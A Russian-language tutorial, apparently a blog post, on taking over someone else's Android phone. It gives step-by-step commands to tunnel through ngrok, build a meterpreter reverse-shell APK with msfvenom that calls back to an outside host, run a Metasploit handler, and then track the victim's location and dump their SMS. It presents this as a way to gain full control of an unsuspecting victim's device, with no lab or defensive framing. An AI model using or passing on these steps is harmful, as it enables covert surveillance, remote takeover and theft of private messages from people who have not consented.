Проникаем в чужой смартфон
Расскажем, как проникнуть в чужой телефон, используя metasploit и ngrok.
Всем салют, дорогие друзья!
В сегодняшней статье вы узнаете о том, как проникнуть в чужой смартфон, используя metasploit и ngrok.
После прочтения статьи вы сможете взломать чужой Android смартфон и получить полный контроль над ним.
Для начала зайдите на сайт Ngrok и создайте там аккаунт. После этого скачайте непосредственно сам ngrok.
Затем закиньте скаченный архив на рабочий стол и напишите в терминале:
unzip ngrok-stable-linux-amd64.zip
Далее введите в терминале:./ngrok authtoken <TOKEN>
После пропишите: ./ngrok tcp 4444
Теперь мы перейдем к созданию нашего пейлоада для Android.
В этом поможет msfvenom, в новом окне терминала пишем:
msfvenom -p android/meterpreter/reverse_tcp LHOST=0.tcp.ngrok.io LPORT=10612 R > payload.apk
Если ты не используешь Ngrok, то в поле LHOST вписываешь свой ip адрес, а в поле LPORT ставишь 4444
Теперь необходимо узнать ип, если вы используете Kali Linux, то это можно сделать командой "ipconfig", а если Arch то "ip a".
Ну, а дальше в бой пойдет сам метасплоит (кстати, он предустановлен в Kali Linux)
Для того, чтобы его запустить, необходимо просто написать в терминале msfconsole.
msfconsole use exploit/multi/handler set PAYLOAD android/meterpreter/reverse_tcp set LHOST localhost set LPORT 4444 exploit
После того, как жертва запустит пайлоад, у вас откроется сессия:
Теперь у вас есть доступ к смартфону жертвы.
Давайте, для примера, узнаем текущую геолокацию: geolocate
Также можно сделать, например, дамп всех смс, командой: sms_dump
Данными действиями вы произвели подключение к телефону, и у получили полный набор возможностей для дальнейших действий с ним.
На сегодня это все. Благодарим за внимание.
